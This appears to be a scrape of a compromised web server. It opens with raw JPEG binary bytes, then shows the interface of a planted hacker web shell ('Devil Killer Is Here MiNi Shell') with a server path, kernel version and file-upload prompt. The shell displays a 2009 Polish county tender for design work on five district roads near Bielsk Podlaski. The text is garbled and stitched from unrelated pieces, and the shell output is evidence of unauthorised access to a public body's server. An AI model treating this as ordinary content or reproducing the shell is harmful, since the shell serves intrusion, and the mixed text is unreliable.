JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090225/40640-N-2009.html

<p class="kh_header"><b>Bielsk Podlaski: Opracowanie dokumentacji na:
Zadanie 1: Przebudowa drogi powiatowej Nr 1611B od drogi powiatowej Nr 1603B 
Pasynki - Krzywa do końca miejscowości Łoknica, dł. 0,823 km 
Zadanie 2: Przebudowa drogi  powiatowej Nr 1654B w miejscowości Parcewo, dł. 1,655 km 
Zadanie 3:Remont drogi powiatowej Nr 1654B w miejscowości Orla-ulica Bielska, dł.0,604 km 
Zadanie 4: Przebudowa drogi powiatowej Nr 1688B w miejscowości Piliki, dł.1,32 km
Zadanie 5: Przebudowa drogi  powiatowej Nr 1586B od drogi powiatowej Nr 1575B do miejscowości Woronie, dł. 2,2 km</b><br>
<b>Numer ogłoszenia: 40640 - 2009; data zamieszczenia: 25.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg , ul. Sportowa 4, 17-100 Bielsk Podlaski, woj. podlaskie, tel. 085 8332684, faks 085 8332685.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatbielski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zarządzanie drogami powiatowymi.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji na:
Zadanie 1: Przebudowa drogi powiatowej Nr 1611B od drogi powiatowej Nr 1603B 
Pasynki - Krzywa do końca miejscowości Łoknica, dł. 0,823 km 
Zadanie 2: Przebudowa drogi  powiatowej Nr 1654B w miejscowości Parcewo, dł. 1,655 km 
Zadanie 3:Remont drogi powiatowej Nr 1654B w miejscowości Orla-ulica Bielska, dł.0,604 km 
Zadanie 4: Przebudowa drogi powiatowej Nr 1688B w miejscowości Piliki, dł.1,32 km
Zadanie 5: Przebudowa drogi  powiatowej Nr 1586B od drogi powiatowej Nr 1575B do miejscowości Woronie, dł. 2,2 km.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje opracowanie następujących elementów zadania:
a) projektu budowlany - 4 egzemplarze oraz 1 egz. w wersji elektronicznej (skan) na CD
b) projektu wykonawczeg0 - 4 egzemplarze oraz 1 egz. w wersji elektronicznej (skan) na CD
- kosztorysu inwestorskiego z przedmiarem inwestorskim - 1 egzemplarz plus 1 egz. w wersji elektronicznej
- kosztorysu ofertowego  z przedmiarem - 1 egzemplarz plus 1 egz. w wersji  elektronicznej
c) projektu stałej organizacji ruchu - 3 egzemplarze
d) komplet Szczegółowych Specyfikacji Technicznych - 1 egzemplarz w wersji papierowej i elektronicznej
e) przygotowanie materiałów do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach - przedsięwzięcia wg art. 74 ust.1 ustawy z dnia 3 października 2008 roku o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko Dz.U.z 2008 r. Nr 199 poz.1227 - 3 egz. w wersji papierowej i 1 egz. wersja elektroniczna plus kserokopia mapy ewidencyjnej wg zakresu opracowania (ze skróconym wypisem ze skorowidza działek) - jeżeli zachodzi konieczność uzyskania decyzji
f) operat wodnoprawny łącznie z materiałami do uzyskania pozwolenia wodnoprawnego - jeżeli zachodzi konieczność uzyskania decyzji - 2 egzemplarze
g) materiały do decyzji lokalizacji inwestycji celu publicznego - jeśli zachodzi konieczność uzyskania decyzji 
h) uzgodnienie dokumentacji z właścicielami instalacji znajdującymi się w pasie drogowym oraz innymi zarządcami dróg w przypadku wejścia w ich pas ewidencyjny i uzgodnienie przez P.Z.U.D (jeśli jest wymagane).
Do obowiązków projektanta należy też:
a) uzyskanie aktualnego wtórnika lewostronnego zgodnie z zakresem opracowania w skali 1:1000 poza obszarem zabudowy i w skali 1:500 w obszarze zabudowy z założeniem reperów roboczych nie rzadziej niż co 300 m z podaniem ich lokalizacji oraz rzędnych reperów w projekcie wykonawczym;
b) pełnienie nadzoru autorskiego w czasie realizacji zamówienia;
c) dołączenie do projektu wykonawczego wyników badania podłoża gruntowego dla przedmiotowego opracowania.

Zadanie 1: Przebudowa drogi powiatowej Nr 1611B od drogi powiatowej Nr 1603B Pasynki - Łoknica  - Krzywa do granicy powiatu Bielskiego, dł. 0,823 km
1.	STAN ISTNIEJĄCY
1.1	Szerokość istniejącej jezdni i korona
11+285 - 11+443 przekrój trasowy; jezdnia bitumiczna 5,2 m;
11+443 - 12+083 przekrój trasowy; jezdnia brukowa  5,0 m;
12+083 - 12+108 przekrój trasowy; jezdnia żwirowa szerokości  5, m; korona 9,0 -7,0 m.
1.2	Sytuacja trasy
Na przebudowywanym odcinku droga posiada przekrój daszkowy i jednostronny.
1.3	Niweleta drogi (ocena wizualna)
Niweleta drogi wymaga korekty ze względu na poprawę płynności.
1.4	Stan rowów i innych urządzeń odwadniających
Na przedmiotowym odcinku drogi znajdują się przepusty:
w km 11+484 fi 60 cm betonowy, długości 1 m bez murków
w km 11+585 przepust korytkowy, długości 8,5 m całkowicie zamulony
w km 11+876 fi 60 cm betonowy, długości 8,0 m bez murków
w km 12+023 2 fi 80 cm betonowy, długości 10 m bez murków
w km 12+104 fi 60 cm betonowy, długości 10 m z murkami
Rozwiązanie kompleksowe odwodnienia w miejscowości Łoknica
Poprawa odwodnienia - odtworzenie rowów odmulenie wg potrzeb.
1.5	Sprawy inne
Należy rozwiązać sytuacyjnie i wysokościowo skrzyżowanie drogi powiatowej Nr 1603 z drogą Nr 1614B do miejscowości Lady w km około 12+075.
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1	Wnioskowany charakter robót:  przebudowa
2.2	Wyjściowe parametry techniczne do projektowania:
2.2.1	Kategoria terenu		-  płaski
2.2.2	Klasa techniczna drogi	-  L
2.2.3	Przekrój poprzeczny(normalny):
przekrój trasowy - szerokość jezdni 5,5 m,  spadki poprzeczne pobocza 6%.
2.3	Konstrukcja nawierzchni:
2.3.1	Kategoria ruchu - określona w oparciu o wykonane pomiary ruchu
2.3.2	Nawierzchnia: zgodnie z rozporządzeniem MTiGM z dnia 02.03.1999 r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie, (Dz.U. Nr 43 z dnia 14.05.1999 r)
2.4	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
- uzbrojenie przebudowywanego odcinka drogi należy pobrać z aktualnego podkładu geodezyjnego i przedstawić w opisie technicznym;
- zwrócić szczególną uwagę na odprowadzenie wód powierzchniowych.
2.5	Inne informacje
- PZD jest na etapie uzyskiwania decyzji o środowiskowych uwarunkowaniach.

Zadanie 2: Przebudowa drogi  powiatowej Nr 1654B w miejscowości Parcewo, dł. 1,655 km (początek opracowania tablica miejsc. Parcewo ,koniec opracowania tablica miejsc. Parcewo)
1.	STAN ISTNIEJĄCY
1.1	Szerokość istniejącej jezdni i korona
2+734 - 4+389 przekrój trasowy; jezdnia bitumiczna szerokości 6,0 - 6,2 m; korona  8,0 m; miejscami występuje stary chodnik z płytki betonowej 35x35x5 cm.
1.2	Sytuacja trasy
Na przebudowywanym odcinku droga posiada przekrój daszkowy i jednostronny.
1.3	Niweleta drogi (ocena wizualna)
Niweleta drogi wymaga korekty ze względu na poprawę płynności.
1.4	Stan rowów i innych urządzeń odwadniających
Na przedmiotowym odcinku drogi znajdują się następujące przepusty:
3+499 	przepust żelbetowy fi 80 cm, długości 11,5 m, z murkami, rury  poprzesuwane, przesypuje się nasyp - do przebudowy
4+267 	przepust żelbetowy fi 60 m; długości 10,5 m z murkami, rury poprzesuwane, przesypuje się nasyp - do przebudowy
Zwrócić szczególną uwagę na odprowadzenie wód powierzchniowych. Poprawić odwodnienia - poprzez odtworzenie rowów wg potrzeb.
1.5	Sprawy inne
Uzbrojenie przebudowywanego odcinka drogi należy pobrać z aktualnego podkładu geodezyjnego i przedstawić w opisie technicznym (w miejscowości w pasie drogowym jest wodociąg, kanalizacja sanitarna i linia telefoniczna oraz energetyczna).
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1	Wnioskowany charakter robót:  przebudowa
2.2	Wyjściowe parametry techniczne do projektowania:
2.2.1	Kategoria terenu		-  płaski
2.2.2	Klasa techniczna drogi	-  Z
2.3	Konstrukcja nawierzchni:
2.3.1	Kategoria ruchu - określona w oparciu wykonane pomiary ruchu
2.3.2	Nawierzchnia: zgodnie z rozporządzeniem MTiGM z dnia 02.03.1999 r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie, (Dz.U. Nr 43 z dnia 14.05.1999 r).
2.4	Propozycje przebudowy:
Należy przedstawić zamawiającemu do akceptacji koncepcję przebudowy mając na uwadze poprawę bezpieczeństwa ruchu kołowego i pieszego tzn:
- zaprojektować zatoki autobusowe z peronami po obu stronach jezdni
- zaprojektować parking dla samochodów osobowych przy Cerkwi i cmentarzu
- zaprojektować ciąg pieszy lub pieszo - rowerowy w miejscowości 
- rozwiązać sytuacyjnie i wysokościowo skrzyżowanie:
    - z drogą powiatową Nr 1680B do miejscowości Spiczki
    - z drogą gminną do miejscowości Hołody
- zaprojektować wzmocnienie istniejącej jezdni betonem asfaltowym.

Zadanie 3 : Remont drogi powiatowej Nr 1654B w miejscowości Orli-ulica Bielska,dł.0,604 km (ulica Bielska od skrzyżowania z ulicą Sienkiewicza do ulicy Mickiewicza)
1.	STAN ISTNIEJĄCY
1.1	Szerokość istniejącej jezdni i korona (km roboczy)
0+000 - 0+604 przekrój uliczny jezdnia bitumiczna 7,1 - 6,0 m : obustronne chodniki z elementów betonowych.
1.2	Sytuacja trasy
Na przebudowywanym odcinku droga posiada przekrój daszkowy.
1.3	Niweleta drogi (ocena wizualna)
Niweleta drogi wymaga korekty ze względu na poprawę płynności, równości podłużnej i poprzecznej.
1.4	Sprawy inne
Należy rozwiązać sytuacyjnie i wysokościowo skrzyżowanie drogi powiatowej z drogami gminnymi.
Kopię mapy sytuacyjno- wysokościowej dostarczy Zamawiający.
Wykonawca winien wykonać przekroje poprzeczne istniejącej nawierzchni nie rzadziej niż co 20 m.
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1	Wnioskowany charakter robót:  przebudowa
2.2	Wyjściowe parametry techniczne do projektowania:
2.2.1	Kategoria terenu		-  płaski
2.2.2	Klasa techniczna drogi	-  Z
2.2.3	Przekrój poprzeczny (normalny): przekrój uliczny.
2.3	Konstrukcja  nawierzchni:
2.3.1	Kategoria ruchu - określona w oparciu o wykonane pomiary ruchu.
2.3.2	Nawierzchnia: zgodnie z rozporządzeniem MTiGM z dnia 02.03.1999 r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie, (Dz.U. Nr 43 z dnia 14.05.1999 r).
2.4	Propozycje przebudowy :
- należy wymienić na całym odcinku krawężnik na nowy;
- dostosować chodniki i zjazdy do nowej niwelety ,stare i połamane elementy wymienić na nowe;
- nadać spadki poprzeczne i podłużne jezdni poprzez frezowanie istniejącej nawierzchni i ewentualne ułożenie warstwy wyrównawczej
- wykonanie nakładki z betonu asfaltowego
- uzbrojenie przebudowywanego odcinka drogi należy pobrać z podkładu geodezyjnego i przedstawić w opisie technicznym; 
- zwrócić szczególną uwagę na odprowadzenie wód powierzchniowych.

Zadanie 4: Przebudowa drogi powiatowej Nr 1688B w miejscowości Piliki dł. 1,350 km (granica pasa drogowego drogi krajowej Nr 19, koniec opracowania znak D-43)
1.	STAN ISTNIEJĄCY
1.1	Szerokość istniejącej jezdni i korona
0+000 - 0+006 przekrój uliczny; jezdnia bitumiczna 6,6 m;
0+006 - 1+238 przekrój uliczny; jezdnia brukowa 6,6 m;
1+238 - 1+320 przekrój trasowy; jezdnia żwirowa  5,5 m;
Na odcinku od 0+010 km do 0+370 obustronny chodnik szerokości 1,4 m z płytki betonowej 0,35x0,35x0,005 cm.
1.2	Sytuacja trasy
Na przebudowywanym odcinku droga posiada przekrój daszkowy.
1.3	Niweleta drogi (ocena wizualna)
Niweleta drogi wymaga korekty ze względu na poprawę płynności.
1.4	Stan rowów i innych urządzeń odwadniających
Na przedmiotowym odcinku drogi znajdują się przepusty :
w km 0+400 2 fi 150 cm żelbetowy, długości 13,7 m z murkami
Rozwiązanie kompleksowe odwodnienia w miejscowości Piliki
Poprawa odwodnienia - odtworzenie rowów odmulenie wg potrzeb.
1.5	Sprawy inne
1. Należy rozwiązać sytuacyjnie i wysokościowo skrzyżowanie drogi powiatowej Nr 1688 z drogą gminną na końcu miejscowości.
2. Od przepustu pod drogą 2 fi 150 w km 0+400 prawie do końca wsi wzdłuż nasypu są rowy lewostronne i prawostronne znajdujące się poza pasem drogowym i spełniające funkcję odwodnienia przyległych terenów. Remont (renowację) tych rowów  należy ująć w odrębnym drugim opracowaniu (dokumentacja budowlana i techniczna).
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1	Wnioskowany charakter robót:  przebudowa
2.2	Wyjściowe parametry techniczne do projektowania:
2.2.1	Kategoria terenu		-  płaski
2.2.2	Klasa techniczna drogi	-  L
2.2.3	Przekrój uliczny
2.3	Konstrukcja nawierzchni:
2.3.1	Kategoria ruchu - określona w oparciu o wykonane pomiary ruchu.
2.3.2	Nawierzchnia: zgodnie z rozporządzeniem MTiGM z dnia 02.03.1999 r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie, (Dz.U. Nr 43 z dnia 14.05.1999 r).
2.4	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
- uzbrojenie przebudowywanego odcinka drogi należy pobrać z aktualnego podkładu geodezyjnego i przedstawić w opisie technicznym;
- zwrócić szczególną uwagę na odprowadzenie wód powierzchniowych.

Zadanie 5: Przebudowa drogi powiatowej Nr 1586B od drogi powiatowej Nr 1575B do miejscowości Woronie, dł. 2,2 km (początek opracowania krawędź jezdni bitumicznej drogi Nr 1575B, koniec opracowania winien obejmować skrzyżowanie z drogą gminną).
1.	STAN ISTNIEJĄCY
1.1	Szerokość istniejącej jezdni i korona
0+000 - 2+200 przekrój trasowy; jezdnia gruntowa ulepszona szerokości 4 m-5 m, korona 6,2 m-6,7 m, pas drogowy szerokości 9 m i 11 m.
1.2	Sytuacja trasy
Na przebudowywanym odcinku droga posiada przekrój daszkowy.
1.3	Niweleta drogi (ocena wizualna)
Niweleta drogi wymaga korekty ze względu na poprawę płynności.
1.4	Stan rowów i innych urządzeń odwadniających
Na przedmiotowym odcinku drogi znajdują się przepusty:
w km 0+005 fi 60 cm betonowy, długości 10 m bez murków
w km 1+050 fi 80 cm betonowy, długości 9 m zakończony betonowymi dokami.
1.5	Sprawy inne
Należy rozwiązać sytuacyjnie i wysokościowo skrzyżowanie drogi powiatowej Nr 1586 z drogą gminną do miejscowości Woronie.
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1	Wnioskowany charakter robót:  przebudowa
2.2	Wyjściowe parametry techniczne do projektowania:
2.2.1	Kategoria terenu		-  płaski
2.2.2	Klasa techniczna drogi	-  L
2.2.3	Przekrój poprzeczny(normalny): 
przekrój trasowy - szerokość jezdni 5,0 m, spadki poprzeczne pobocza 6%.
2.3	Konstrukcja nawierzchni:
2.3.1	Kategoria ruchu - określona w oparciu o wykonane pomiary ruchu.
2.3.2	Nawierzchnia: zgodnie z rozporządzeniem MTiGM z dnia 02.03.1999 r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie, (Dz.U. Nr 43 z dnia 14.05.1999 r).
2.4	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
- uzbrojenie przebudowywanego odcinka drogi należy pobrać z aktualnego podkładu geodezyjnego i przedstawić w opisie technicznym;
Odtworzenie rowów wg potrzeb.

Inne wymagania wobec wykonawcy dokumentacji:
Zamawiający zastrzega sobie prawo do używania i sporządzania kopii elementów dokumentacji dla celów procedury przetargowej, bez uzyskiwania zezwolenia Jednostki projektującej na sporządzenie kopii do takiego użytku, przy zachowaniu praw autorskich dla opracowanego przez siebie projektu Jednostki Projektującej.
Przekazanie dokumentacji nastąpi na podstawie protokołu odbioru spisanego z przedstawicielem PZD .
Zaleca się aby oferent dokonał wizji lokalnej na obiekcie będącym elementem zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> a) W postępowaniu o udzielenie zamówienia, mogą wziąć udział wykonawcy, którzy: 1. Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych. 2. Złożą ofertę wraz z wymaganymi dokumentami, załącznikami oraz zaświadczeniami. Ofertę należy sporządzić ściśle wg wzoru druku załączonego przez zamawiającego. 3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 4. Spełniają pozostałe warunki określone w Specyfikacji Istotnych Warunków Zamówienia. b) Z postępowania o udzielenie zamówienia wyklucza się wykonawców na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych. c) O wykluczeniu z postępowania o udzielenie zamówienia wykonawcy zostaną niezwłocznie zawiadomieni. d) Oferta wykonawcy wykluczonego uznana zostanie za odrzuconą. e) Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach wyszczególnionych w SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A) W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności objętych przedmiotem zamówienia oraz nie podlega wykluczeniu, do oferty należy dołączyć następujące dokumenty: 
1) aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2) pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów,
B) W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty:
1) wykaz pracowników przewidzianych do wykonania zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, (należy dołączyć ksera posiadanych uprawnień wymaganych obowiązującymi przepisami).
2) zaświadczenie z właściwego oddziału Izby Inżynierów Budownictwa potwierdzające przynależność wykonawcy do tej izby,
3) udokumentowanie wykonania co najmniej trzech dokumentacji porównywalnych z niniejszym przedmiotem zamówienia, wykonanym w ciągu ostatnich 3 lat. Dokumentami potwierdzającymi spełnianie warunku mogą być:
- sporządzony przez oferenta wykaz zrealizowanych dokumentacji o podobnym zakresie i charakterze z podaniem zamawiającego, jego adresu i telefonu oraz długości opracowania i wartości lub referencje zawierające ww. dane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiatbielski.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg 17-100 Bielsk Podlaski ul. Sportowa 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2009 godzina 10:00, miejsce: Powiatowy Zarząd Dróg 17-100 Bielsk Podlaski ul. Sportowa 4 pokój Nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1: Przebudowa drogi powiatowej Nr 1611B od drogi powiatowej Nr 1603B Pasynki - Krzywa do końca miejscowości Łoknica, dł. 0,823 km.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	STAN ISTNIEJĄCY
1.1	Szerokość istniejącej jezdni i korona
	11+285 - 11+443 przekrój trasowy; jezdnia bitumiczna 5,2 m;
	11+443 - 12+083 przekrój trasowy; jezdnia brukowa  5,0 m;
	12+083 - 12+108 przekrój trasowy; jezdnia żwirowa szerokości  5, m; 
             korona 9,0 -7,0 m.
1.2	Sytuacja trasy
Na przebudowywanym odcinku droga posiada przekrój daszkowy i jednostronny.
1.3	Niweleta drogi (ocena wizualna)
Niweleta drogi wymaga korekty ze względu na poprawę płynności.
1.4	Stan rowów i innych urządzeń odwadniających
Na przedmiotowym odcinku drogi znajdują się przepusty:
w km 11+484 fi 60 cm betonowy, długości 1 m bez murków
w km 11+585 przepust korytkowy, długości 8,5 m całkowicie zamulony
w km 11+876 fi 60 cm betonowy, długości 8,0 m bez murków
w km 12+023 2 fi 80 cm betonowy, długości 10 m bez murków
w km 12+104 fi 60 cm betonowy, długości 10 m z murkami
Rozwiązanie kompleksowe odwodnienia w miejscowości Łoknica
Poprawa odwodnienia - odtworzenie rowów odmulenie wg potrzeb.
1.5	Sprawy inne
Należy rozwiązać sytuacyjnie i wysokościowo skrzyżowanie drogi powiatowej Nr 1603 z drogą Nr 1614B do miejscowości Lady w km około 12+075.
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1	Wnioskowany charakter robót:  przebudowa
2.2	Wyjściowe parametry techniczne do projektowania:
2.2.1	Kategoria terenu		-  płaski
2.2.2	Klasa techniczna drogi	-  L
2.2.3	Przekrój poprzeczny(normalny):
przekrój trasowy - szerokość jezdni 5,5 m,  spadki poprzeczne pobocza 6%.
2.3	Konstrukcja nawierzchni:
2.3.1	Kategoria ruchu - określona w oparciu o wykonane pomiary ruchu
